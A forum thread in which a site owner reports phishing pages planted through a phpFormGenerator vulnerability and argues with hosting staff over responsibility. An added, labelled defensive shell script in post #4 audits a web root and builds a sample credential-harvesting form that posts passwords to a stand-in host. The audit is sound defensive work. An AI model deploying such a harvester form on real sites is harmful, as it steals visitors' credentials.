PowWeb Forums - The Perfect Community for the Perfect Host  

Old 3-15-12, 07:30 PM   #1
ArVee
Registered
 
Join Date: Mar 2012
Location: Ill-annoy
Posts: 3
Reputation: 0
phpFormGenerator 2.09.c vulnerability

A web site I manage was the target of an exploit against phpFormGenerator 2.09.c.
Below are some links that document the exploit. The information has also been sent to powweb support.

Last edited by IanS; 3-16-12 at 05:04 AM. Reason: Links removed. New members aren't allowed to post links.
Old 3-16-12, 04:18 PM   #2
Jim M
PowWeb Staff
 
Join Date: Sep 2011
Location: Phoenix, AZ
Posts: 93
Reputation: 76
Appreciate the heads-up. I've let management know and imagine they'll contact Simple Scripts to let them know.
Old 3-30-12, 10:29 PM   #3
ArVee
Registered
 
Join Date: Mar 2012
Location: Ill-annoy
Posts: 3
Reputation: 0
I'd like to get things straight, clear as it were. I had two sites suspended within the last month (nithunder.com, aipandc.com), both after complaints from a third party about phishing pages hosted on those sites. The only script in use on either site was phpFormGenerator. Both phishing attempts took advantage of exploits that I found well documented from as far back as at least 2010. Perhaps I should have researched the script more closely before I installed it; live and learn, I guess. Never mind that the script is offered in PowWeb's Install Central package, the ultimate responsibility is mine when using software, even if the assumption is that PowWeb has vetted the software it offers for use.

Okay, I can live with that. What I have a hard time understanding is why PowWeb is still offering a script that is vulnerable to remote exploits. I hope the security dept. did not need me to inform them of the documented weaknesses inherent in the phpFormGenerator script. Having said that, I have to wonder if other users of the script have had similar experiences with it. If so, why is it still being offered? If not, I have to assume that they will sooner or later. This was not a personal attack, just the luck of the draw, as far as I'm concerned.

Why host a script that has proven vulnerabilities? Is it that the documented exploits do not threaten PowWeb's security, and only constitute an issue for individual users? Does the security dept. feel that any problems are easily dealt with by suspending a site and placing the responsibility for any corrections on the users of said script? I hope you can understand the source of my confusion and can offer some glimmer of reason as to why the situation is as it is.
Old 3-31-12, 03:17 PM   #4
Jim M
PowWeb Staff
 
Join Date: Sep 2011
Location: Phoenix, AZ
Posts: 93
Reputation: 76
Quote:
Originally Posted by ArVee:
Does the security dept. feel that any problems are easily dealt with by suspending a site and placing the responsibility for any corrections on the users of said script? I hope you can understand the source of my confusion and can offer some glimmer of reason as to why the situation is as it is.
The User Agreement:
http://www.powweb.com/legal/legal_useragreement.bml
is actually very clear on who is responsible for apps like this: "Any security risks including, but not limited to, hacking, phishing and information piracy are the sole responsibility of the User."

That's pretty standard. We didn't write the Form Generator and don't maintain it; we simply provide a means by which you can, if you wish, install it. Doing so, and any issues which result, are really your responsibility. We obviously don't want customers to upload vulnerable applications [believe me, I spend far too much of my day dealing with the fallout and trying to help with the resulting problems], but it's also important to note that PowWeb is not SimpleScripts, and so all I am able to do is pass information like this to the appropriate parties.

The bottom line is, due diligence. Before you install any third-party app, look into it. See if that's the latest version. Check for reports of vulnerabilities. For an ounce of prevention is definitely better than a ton of cure.
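The incident ArVee describes in post #3 (sites suspended because a third party found phishing pages on them, with phpFormGenerator the only script installed) and the due diligence Jim M asks for in post #4 are things a site owner can check for on the server itself. The script below is an added example, not code from this thread, from PowWeb or from phpFormGenerator, and it does not describe the actual exploit: it audits a web root for files newer than a baseline, HTML forms that post to an external host (a heuristic for planted credential-harvesting pages), and world-writable directories where planted files tend to land. The web root layout, the baseline file and the planted form are all constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not from the thread, PowWeb or phpFormGenerator.
# Audit a web root for signs that a vulnerable script was used to drop
# phishing pages. Everything below (paths, sample site, baseline) is
# constructed for the demonstration; the checks are heuristics.

# Web-content files (php/html/htm/js) modified after the reference file.
# Comparing against a file with -newer keeps this POSIX-portable.
find_recent_web_files() {
  webroot=$1
  baseline=$2
  find "$webroot" -type f -newer "$baseline" \
    \( -name '*.php' -o -name '*.html' -o -name '*.htm' -o -name '*.js' \) | sort
}

# Heuristic: a <form> whose action is an absolute http(s) URL. A small site's
# own forms normally post to a relative path; credential harvesters post offsite.
flag_external_forms() {
  find "$1" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' \) \
    -exec grep -l -i -E '<form[^>]*action=["'"'"']?https?://' {} + 2>/dev/null | sort
}

# Directories any account on the host (or the web server acting for any
# visitor) can write into; generated or uploaded content lands here.
find_world_writable_dirs() {
  find "$1" -type d -perm -0002 | sort
}

# Constructed sample site: two legitimate files back-dated to 2012-03-01 and
# one planted credential form in a world-writable directory. Prints the
# temporary root so the caller can clean it up.
make_sample_webroot() {
  root=$(mktemp -d)
  mkdir -p "$root/site/forms" "$root/site/uploads"
  chmod 0755 "$root/site" "$root/site/forms"
  chmod 0777 "$root/site/uploads"
  printf '<html><form action="/forms/contact.php"><input name="email"></form></html>\n' \
    > "$root/site/index.html"
  printf '<?php mail("owner@example.com", "contact", $_POST["email"]); ?>\n' \
    > "$root/site/forms/contact.php"
  touch -t 201203010000 "$root/site/index.html" "$root/site/forms/contact.php"
  printf '<form method="post" action="http://198.51.100.7/collect.php">\n<input type="password" name="pw"></form>\n' \
    > "$root/site/uploads/secure-login.html"
  # Baseline: the last time the operator reviewed the site (constructed date).
  touch -t 201203150000 "$root/baseline"
  echo "$root"
}

# Run all three checks against a web root, comparing mtimes to a baseline file.
audit_webroot() {
  webroot=$1
  baseline=$2
  echo "== web files newer than $baseline =="
  find_recent_web_files "$webroot" "$baseline"
  echo "== forms posting to an external host =="
  flag_external_forms "$webroot"
  echo "== world-writable directories =="
  find_world_writable_dirs "$webroot"
}

# Demonstration against the constructed sample; removed afterwards.
demo=$(make_sample_webroot)
audit_webroot "$demo/site" "$demo/baseline"
rm -rf "$demo"
```

On a real host, point `audit_webroot` at the document root and at a file whose mtime marks the last known-good state (for example, a copy of the installer archive or a marker touched after the last review). Anything the first check lists that the owner did not put there, anything the second check flags, and any directory the third check lists should be inspected by hand; the external-form rule is a heuristic and will not catch a harvester that posts to a relative path and relays from the server.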
Old 4-1-12, 11:09 PM   #5
ArVee
Registered
 
Join Date: Mar 2012
Location: Ill-annoy
Posts: 3
Reputation: 0
I've already stated that I accept responsibility for the software I use; not a problem. I am just surprised that PowWeb would continue to offer a script that hasn't had its vulnerabilities corrected, presumably by Simple Scripts. Wouldn't it be best practice to re-state the legal niceties and provide users with a clear, specific caution about what may happen if they use the script? I would think that such a policy would lessen the security dept.'s workload, allowing them to concentrate their efforts on issues they consider mission critical. Doesn't that make sense?

I know PowWeb's staff are not omniscient and all-powerful, and am only asking that, once verified, complaints about scripts offered are widely dispersed and appropriate cautions are presented, when justified. I am requesting that the security dept. become more interactive, in a public way, by offering their best assessment of any piece of software they have verified may pose a danger to users. Such a policy leaves most of the 'legwork' to users, and only requires a response such as I have roughly sketched out when those pieces of information gathered from users indicate further action is required.

I am grateful for all the people working behind the scenes to ensure the integrity and reliability of our data and sites. Things would be chaotic without their efforts; they deserve our appreciation and respect. I am just asking them to re-assess how they interact with users. I believe all would benefit from such a proposed change in our relationship.
Rick V.
Old 4-2-12, 11:18 AM   #6
entrecon
Custom User Title
 
entrecon's Avatar
 
Join Date: Aug 2006
Location: Michigan
Posts: 2,703
Reputation: 337
For the long time members of this forum it has been pretty standard to NOT use any of the provided scripts for multiple reasons. PowWeb is usually behind the curve in getting them updated. Besides, most of the long time members of this forum are a little bit more advanced in their knowledge and prefer the control of installing a script themselves.

That being said, like ArVee, I am surprised that a script with such a vulnerability is still on Install Central. With all of the newbies who buy hosting here, it is like handing them a real gun and sending them out into a paintball game. There is a certain assumption of safety when something is provided to you.
Old 4-5-12, 03:14 PM   #7
Jim M
PowWeb Staff
 
Join Date: Sep 2011
Location: Phoenix, AZ
Posts: 93
Reputation: 76
Quote:
Originally Posted by ArVee:
I am requesting that the security dept. become more interactive, in a public way, by offering their best assessment of any piece of software they have verified may pose a danger to users. Such a policy leaves most of the 'legwork' to users, and only requires a response such as I have roughly sketched out when those pieces of information gathered from users indicate further action is required. I am grateful for all the people working behind the scenes to ensure the integrity and reliability of our data and sites. Things would be chaotic without their efforts; they deserve our appreciation and respect. I am just asking them to re-assess how they interact with users. I believe all would benefit from such a proposed change in our relationship.
Rick V.
As mentioned before, PowWeb is not SimpleScripts. You may have missed that, when you click on the SimpleScripts icon in the control panel, you are no longer even on powweb.com, but are taken over to SimpleScripts.com. Obviously, we therefore do not have control over what statements are or are not present there.

What you say certainly makes sense. However, here is really not the best place to submit suggestions, because I'm technical support, not a business relationship manager. Going through the feedback form:
http://www.powweb.com/support/suggestions.bml
will get your suggestion in front of more appropriate eyes than posting in a forum.
Old 4-19-12, 09:46 PM   #8
swpowell
 
Join Date: Apr 2007
Location: Stockbridge, Ga
Posts: 459
Reputation: 80
Jim M, can you please take a look at the PM I sent you this evening.
Thanks.
Contents ©PowWeb, Inc. ~ vBulletin, Copyright 2000-2007 Jelsoft Enterprises Limited.